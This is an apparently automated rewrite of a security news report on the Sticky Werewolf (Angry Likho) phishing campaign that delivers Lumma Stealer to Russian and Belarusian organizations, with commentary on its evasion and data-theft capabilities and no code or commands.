Listen to this Post
A cybersecurity threat actor known as Sticky Werewolf has recently been linked to a wave of targeted attacks against organizations in Russia and Belarus. These attacks focus on delivering the highly dangerous Lumma Stealer malware, utilizing a sophisticated, previously undocumented implant. The campaign, tracked by cybersecurity experts as Angry Likho, is drawing parallels with other well-known cybercriminal operations such as Awaken Likho and Core Werewolf. This article delves into the mechanics of the attack, the group’s methods, and its targets, shedding light on the techniques they employ and the threat posed to organizations in the region.
the Attack
The group known as Sticky Werewolf, operating under the moniker Angry Likho, has been launching targeted campaigns primarily aimed at Russian and Belarusian entities. Cybersecurity firm Kaspersky notes that the group’s tactics are highly focused, with a streamlined infrastructure and specific implants used to execute attacks.
The attackers typically target large organizations, including government agencies and their contractors. The group’s phishing techniques involve email attachments, which contain archive files designed to deploy malicious payloads. A previously unknown malware implant is used to deliver the Lumma Stealer, which is capable of harvesting sensitive data, including banking details, login credentials, and even cryptocurrency wallet information.
The attackers are likely native Russian speakers, as evidenced by the use of fluent Russian in their phishing emails. The campaign has been ongoing, with a range of different malware strains used in prior attacks, such as NetWire, Ozone RAT, and DarkTrack. The malware is equipped with anti-detection measures, including checks for sandbox environments to avoid detection by security software.
What Undercode Says: Analysis of the Angry Likho Attack Campaign
Sticky Werewolf’s tactics are a stark reminder of the growing sophistication in modern cybercriminal activity. This attack, tracked as Angry Likho, uses a carefully crafted blend of social engineering and technical ingenuity to bypass security defenses. The group’s reliance on phishing emails with embedded malicious files, such as Windows shortcut files (LNK), is a familiar tactic. However, what sets this campaign apart is the deployment of the Lumma Stealer, an advanced malware capable of harvesting an extensive array of sensitive information.
Lumma Stealer itself is designed to infiltrate browsers and cryptowallets, stealing everything from banking details to private keys. The malware’s ability to target popular software like MetaMask and KeePass demonstrates a sophisticated understanding of what data is valuable to its victims. The inclusion of data-stealing from web browsers, cryptocurrency wallets, and tools like AnyDesk indicates a calculated strategy, not just to steal passwords but to infiltrate systems and networks that may house critical assets, including financial information and corporate data.
The attackers have been found using a series of advanced evasion techniques, including the detection of sandbox environments. This suggests a heightened level of operational security to avoid being caught during analysis. This tactic is particularly worrying because it showcases the group’s ability to circumvent both traditional and next-generation cybersecurity solutions.
From an organizational standpoint, the attack also underscores the rising risk of targeting government entities and their contractors. Such sectors are rich in sensitive information and critical infrastructure, making them prime targets for cyberespionage or financially motivated attacks.
Moreover,
The group’s ongoing evolution—from simple phishing to deploying highly specialized malware—highlights the shifting landscape of cyberattacks. As traditional cybersecurity measures continue to improve, threat actors are also adapting, employing new and refined techniques to stay one step ahead.
Fact Checker Results:
- The use of sophisticated evasion techniques, such as emulator and sandbox detection, is verified and consistent with known behaviors from similar cybercriminal groups.
- The malware’s ability to steal sensitive information, including from cryptocurrency wallets, is supported by multiple cybersecurity reports and observed in previous campaigns.
- The attribution of the group’s origins to Russian speakers is plausible, considering the language and geographical focus of the attacks.
References:
Reported By: https://thehackernews.com/2025/02/sticky-werewolf-uses-undocumented.html
Extra Source Hub:
https://www.stackexchange.com
Wikipedia: https://www.wikipedia.org
Undercode AI
Image Source:
OpenAI: https://craiyon.com
Undercode AI DI v2
